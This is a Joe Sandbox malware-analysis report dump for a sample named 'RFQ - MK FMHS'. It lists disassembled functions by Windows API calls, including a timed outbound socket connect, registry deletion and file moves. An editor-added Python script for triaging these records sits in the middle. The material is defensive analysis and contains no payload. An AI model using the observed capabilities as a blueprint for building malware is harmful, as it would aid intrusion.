                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    APIs
                      • Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ED38D3,?), ref: 00ED48C7
                      • Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ED38D3,?), ref: 00ED48E0
                    • lstrcmpiW.KERNEL32(?,?), ref: 00ED38F3
                    • _wcscmp.LIBCMT ref: 00ED390F
                    • MoveFileW.KERNEL32(?,?), ref: 00ED3927
                    • _wcscat.LIBCMT ref: 00ED396F
                    • SHFileOperationW.SHELL32(?), ref: 00ED39DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    • Opcode ID: 253d2d0de57c9d6317caa85decb51ccc5919d1a85cc985b5b1c2f89f6f20786c
                    • Instruction ID: d005dc773e553cd5f6a40b3024f017534475e2e9f90c3441bb47bad5545e2dd1
                    • Opcode Fuzzy Hash: 253d2d0de57c9d6317caa85decb51ccc5919d1a85cc985b5b1c2f89f6f20786c
                    • Instruction Fuzzy Hash: 95417EB25093449ECB51EF64C4919EFB7E8EF88340F00292FB489E3251EA74D689C752
                    APIs
                    • _memset.LIBCMT ref: 00EF7519
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF75C0
                    • IsMenu.USER32(?), ref: 00EF75D8
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EF7620
                    • DrawMenuBar.USER32 ref: 00EF7633
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
                    • API String ID: 3866635326-4108050209
                    • Opcode ID: 7188522f2bb7bd9a2a3a3c173918b19ce989136e04198b95554fb3beb4d56589
                    • Instruction ID: 13a4cd8b38ad5ca4e0a35146ca851b352b2e893904bda5ee55c5e223afdae41c
                    • Opcode Fuzzy Hash: 7188522f2bb7bd9a2a3a3c173918b19ce989136e04198b95554fb3beb4d56589
                    • Instruction Fuzzy Hash: 1C412875A04608EFDB20DF94D884AAABBF9FF08314F059129EE55A7350D730AD54CFA0
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00EF125C
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF1286
                    • FreeLibrary.KERNEL32(00000000), ref: 00EF133D
                      • Part of subcall function 00EF122D: RegCloseKey.ADVAPI32(?), ref: 00EF12A3
                      • Part of subcall function 00EF122D: FreeLibrary.KERNEL32(?), ref: 00EF12F5
                      • Part of subcall function 00EF122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00EF1318
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EF12E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: 27fb59f247a989ebfe5ce4cc7718d0918dc3ba20bafe8c6bf055d05ef3e27f4d
                    • Instruction ID: cc52f0048640869a41f8923acebcd980d42e0dce3a704ae795e611cad8b9c9b7
                    • Opcode Fuzzy Hash: 27fb59f247a989ebfe5ce4cc7718d0918dc3ba20bafe8c6bf055d05ef3e27f4d
                    • Instruction Fuzzy Hash: 7F3109B190111DFFEB159B91DC89EFEB7BCEF08304F0051AAE601F2151EA749E49DAA4
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00EF655B
                    • GetWindowLongW.USER32(014B7648,000000F0), ref: 00EF658E
                    • GetWindowLongW.USER32(014B7648,000000F0), ref: 00EF65C3
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00EF65F5
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00EF661F
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00EF6630
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00EF664A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: 9acee9adc5fc5eaa86ee9990a4c9019f55b466c9b1ea713eedc27ae77a86904e
                    • Instruction ID: dd5517df3cc2f44a5bda95216241465ed58f5c3eb8955334ccfc311985fedfce
                    • Opcode Fuzzy Hash: 9acee9adc5fc5eaa86ee9990a4c9019f55b466c9b1ea713eedc27ae77a86904e
                    • Instruction Fuzzy Hash: 0F310331604118AFDB208F19DC84F6537E1FF4A328F1951A8F605EB2B6CB61AC44DB91
                    APIs
                      • Part of subcall function 00EE80A0: inet_addr.WSOCK32(00000000), ref: 00EE80CB
                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00EE64D9
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE64E8
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EE6521
                    • connect.WSOCK32(00000000,?,00000010), ref: 00EE652A
                    • WSAGetLastError.WSOCK32 ref: 00EE6534
                    • closesocket.WSOCK32(00000000), ref: 00EE655D
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EE6576
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    • Opcode ID: d94a74fe76a04468eb84543046a06f26b021bc33cc6c94a31187c2fb76661d9b
                    • Instruction ID: e6f8e4b4bdb631615f1f678c0923d7e7d9ca73a6f670b9159c2ef7c6a68f2c4b
                    • Opcode Fuzzy Hash: d94a74fe76a04468eb84543046a06f26b021bc33cc6c94a31187c2fb76661d9b
                    • Instruction Fuzzy Hash: BB31A171600118AFDB10AF25DC85BBE7BE8EF94764F009069F909B72D1CB70AD08CB61
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE0FA
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE120
                    • SysAllocString.OLEAUT32(00000000), ref: 00ECE123
                    • SysAllocString.OLEAUT32 ref: 00ECE144
                    • SysFreeString.OLEAUT32 ref: 00ECE14D
                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00ECE167
                    • SysAllocString.OLEAUT32(?), ref: 00ECE175
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                    • String ID:
                    • API String ID: 3761583154-0
                    • Opcode ID: 1f735445b90f1bcc6171811f97eddece2dcb71c42bdf37584091a1bd8dd7f6b4
                    • Instruction ID: 0b80d3ba3076f283b143a596d6a66563bb436cc5225eb37d0d44096fe840ff1d
                    • Opcode Fuzzy Hash: 1f735445b90f1bcc6171811f97eddece2dcb71c42bdf37584091a1bd8dd7f6b4
                    • Instruction Fuzzy Hash: E421A132601108AF9B109FA9DD88DBB77ECEF49760B448129F914EB360DA71DC42CB64
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                    • API String ID: 1038674560-2734436370
                    • Opcode ID: 718deaf38ff8c2c71e991b8f5301967882e744c16548f0219cc7bed8f631e8b0
                    • Instruction ID: 49a9adefa1611336c130d6d02bb3d8a25eaa137e9571f2d37ad253506bcd9200
                    • Opcode Fuzzy Hash: 718deaf38ff8c2c71e991b8f5301967882e744c16548f0219cc7bed8f631e8b0
                    • Instruction Fuzzy Hash: 04213A7220415166D630E634DE12FE7B3E9DF51354F14A03DF885B6181EB73AE83E2A5
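Three of the records above carry the information a triager actually wants from this listing: the socket, ioctlsocket(0x8004667E, which is FIONBIO), connect, WSAGetLastError sequence (an outbound TCP connect with a timeout rather than a blocking one), the RegEnumKeyExW/RegDeleteKeyW recursion, and the function that compares input against the AutoIt directives #requireadmin, #notrayicon and #OnAutoItStartRegister, which marks interpreter code rather than script payload. The following Python is an added example by the editor, not part of the Joe Sandbox report and not code recovered from the sample: it parses call lines exactly as the report renders them, tags each function by the imports it uses, and flags the non-blocking connect pattern. The capability map, the AutoIt-directive heuristic and the ranking are assumptions; the embedded sample input is constructed from records copied off this page.

```python
"""Triage the per-function 'APIs' records rendered on this page.

Added example by the editor, not part of the Joe Sandbox report and not code
recovered from the sample. SAMPLE is copied from records on this page; the
capability map and the AutoIt directive heuristic are assumptions."""
import re

# One call line as the report renders it, with or without an argument list,
# optionally prefixed by "Part of subcall function XXXX:".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<s>.*?)\s*$")
FIONBIO = "8004667E"  # ioctlsocket command: switch the socket to non-blocking

# Imports worth a second look, grouped by capability (assumption).
CAPABILITIES = {
    "network": {"socket", "connect", "ioctlsocket", "closesocket", "inet_addr", "send", "recv"},
    "registry_read": {"RegConnectRegistryW", "RegOpenKeyExW", "RegEnumKeyExW", "RegEnumValueW"},
    "registry_write": {"RegDeleteKeyW", "RegSetValueExW", "RegCreateKeyExW"},
    "file_ops": {"MoveFileW", "SHFileOperationW", "CopyFileW", "DeleteFileW"},
    "dynamic_import": {"LoadLibraryExW", "GetProcAddress"},
}
# AutoIt script directives: a function that matches these is the interpreter's
# own directive parser, not the script's payload (heuristic, assumption).
AUTOIT_DIRECTIVES = ("#requireadmin", "#notrayicon", "#OnAutoItStartRegister")

def parse_records(text):
    """One record per 'APIs' header: its calls and its 'String ID' line."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"calls": [], "strings": ""}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            cur["calls"].append({"name": m["name"], "module": m["module"],
                                 "args": m["args"] or "", "ref": m["ref"],
                                 "subcall": m["sub"] is not None})
            continue
        m = STRING_RE.match(line)
        if m:
            cur["strings"] = m["s"]
    return records

def tag_record(rec):
    """Capability tags from direct and subcall imports plus the directive heuristic."""
    names = {c["name"] for c in rec["calls"]}
    tags = {cap for cap, apis in CAPABILITIES.items() if names & apis}
    if any(d in rec["strings"] for d in AUTOIT_DIRECTIVES):
        tags.add("autoit_runtime")
    return tags

def nonblocking_connect(rec):
    """socket + ioctlsocket(FIONBIO) + connect + WSAGetLastError among the
    function's own calls: a connect with a timeout rather than a blocking one."""
    own = [c for c in rec["calls"] if not c["subcall"]]
    fionbio = any(c["name"] == "ioctlsocket" and FIONBIO in c["args"].split(",") for c in own)
    return fionbio and {"socket", "connect", "WSAGetLastError"} <= {c["name"] for c in own}

def function_ref(rec):
    """Address of the first direct call (rough locator); None if the record lists none."""
    own = [c["ref"] for c in rec["calls"] if not c["subcall"]]
    return own[0] if own else None

def triage(text):
    """(ref, sorted tags) for every record that earns at least one tag."""
    out = []
    for rec in parse_records(text):
        tags = tag_record(rec)
        if nonblocking_connect(rec):
            tags.add("nonblocking_connect")
        if tags:
            out.append((function_ref(rec), sorted(tags)))
    return out

# Constructed sample input: three records copied from this page.
SAMPLE = """\
APIs
  • Part of subcall function 00EE80A0: inet_addr.WSOCK32(00000000), ref: 00EE80CB
• socket.WSOCK32(00000002,00000001,00000006), ref: 00EE64D9
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EE6521
• connect.WSOCK32(00000000,?,00000010), ref: 00EE652A
• WSAGetLastError.WSOCK32 ref: 00EE6534
• closesocket.WSOCK32(00000000), ref: 00EE655D
• String ID:
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00EF125C
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF1286
  • Part of subcall function 00EF122D: RegCloseKey.ADVAPI32(?), ref: 00EF12A3
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00EF12E0
APIs
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
"""

if __name__ == "__main__":
    for ref, tags in triage(SAMPLE):
        print(ref or "(no direct calls)", ", ".join(tags))
```

Run it over the whole report text rather than SAMPLE to get one line per function; everything tagged only autoit_runtime or gui-only imports (menus, BSTRs, progress bars) is interpreter code shared by every compiled AutoIt binary, so the functions that keep a network or registry_write tag are the ones to open in the disassembler first.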
                    APIs
                      • Part of subcall function 00E71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E71D73
                      • Part of subcall function 00E71D35: GetStockObject.GDI32(00000011), ref: 00E71D87
                      • Part of subcall function 00E71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E71D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EF78A1
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EF78AE
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EF78B9
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EF78C8
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EF78D4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: 0165fae795f1ad804bb39d86d9cb34cb4bcfec1778e70c3564113c91befefc82
                    • Instruction ID: d802f4a06b36322d646b30c51015666d5f89ac1e016b6cb156e004209e995d8d
                    • Opcode Fuzzy Hash: 0165fae795f1ad804bb39d86d9cb34cb4bcfec1778e70c3564113c91befefc82
                    • Instruction Fuzzy Hash: 2B118EB211022DBEEF159E60CC85EE77F6DEF087A8F015124FB44A2090CB729C21DBA4
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E94292,?), ref: 00E941E3
                    • GetProcAddress.KERNEL32(00000000), ref: 00E941EA
                    • EncodePointer.KERNEL32(00000000), ref: 00E941F6
                    • DecodePointer.KERNEL32(00000001,00E94292,?), ref: 00E94213
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 3489934621-340411864
                    • Opcode ID: e3296cfec77c54d87a669595548f3ea1b7c176bd421d2624c03d65183437c566
                    • Instruction ID: 7f9f9b08c6801b7605c1236169d4978f6c6096dee2b81566568ab2aa79870b9f
                    • Opcode Fuzzy Hash: e3296cfec77c54d87a669595548f3ea1b7c176bd421d2624c03d65183437c566
                    • Instruction Fuzzy Hash: 44E012B06917449EEF116B72EC4DF243696BB51716F504424F411F50F0DBF56495EF20
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E941B8), ref: 00E942B8
                    • GetProcAddress.KERNEL32(00000000), ref: 00E942BF
                    • EncodePointer.KERNEL32(00000000), ref: 00E942CA
                    • DecodePointer.KERNEL32(00E941B8), ref: 00E942E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 3489934621-2819208100
                    • Opcode ID: cc2bb689d9805d28c0b7f752a30ce9729e5ad84dd5c274c130f963b22fd5e5e6
                    • Instruction ID: 7cdebf43aceba428a10d62c50bd6a441720b261045dd7972d20e2e34b9b3f516
                    • Opcode Fuzzy Hash: cc2bb689d9805d28c0b7f752a30ce9729e5ad84dd5c274c130f963b22fd5e5e6
                    • Instruction Fuzzy Hash: D7E0B6B8692705AFEB51AB61EC0DF153AA6BB64B56F104024F001F12F0CBB4A988FA15
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    • API String ID: 3253778849-0
                    • Opcode ID: 9878d26070b011936cad77e1676243b9e2a31e5d9705435f175891a5af6f413f
                    • Instruction ID: 9f8a1b431f10ccb39d5747a8c1d13ed3ce982a487aa6ca9283ece15248dc7883
                    • Opcode Fuzzy Hash: 9878d26070b011936cad77e1676243b9e2a31e5d9705435f175891a5af6f413f
                    • Instruction Fuzzy Hash: 8161BB3050065A9BDF15EF20C882EFE37E5EF84308F04A55AF9597B292DB31AD42DB50
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00EF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0548
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF0588
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00EF05AB
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EF05D4
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EF0617
                    • RegCloseKey.ADVAPI32(00000000), ref: 00EF0624
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    • API String ID: 4046560759-0
                    • Opcode ID: e49f951d1e52fd807d0ddcc0d0415d0c568a1550b1763e9d1ba92fde95dd5088
                    • Instruction ID: 86457dff544992663e5165cc0102a3c212c0432117c9e61274acd208a2751a24
                    • Opcode Fuzzy Hash: e49f951d1e52fd807d0ddcc0d0415d0c568a1550b1763e9d1ba92fde95dd5088
                    • Instruction Fuzzy Hash: 0D515C31208204AFCB14EF54C885E6FBBE9FF84314F04995DF699A72A2DB71E905CB52
                    APIs
                    • GetMenu.USER32(?), ref: 00EF5A82
                    • GetMenuItemCount.USER32(00000000), ref: 00EF5AB9
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EF5AE1
                    • GetMenuItemID.USER32(?,?), ref: 00EF5B50
                    • GetSubMenu.USER32(?,?), ref: 00EF5B5E
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00EF5BAF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
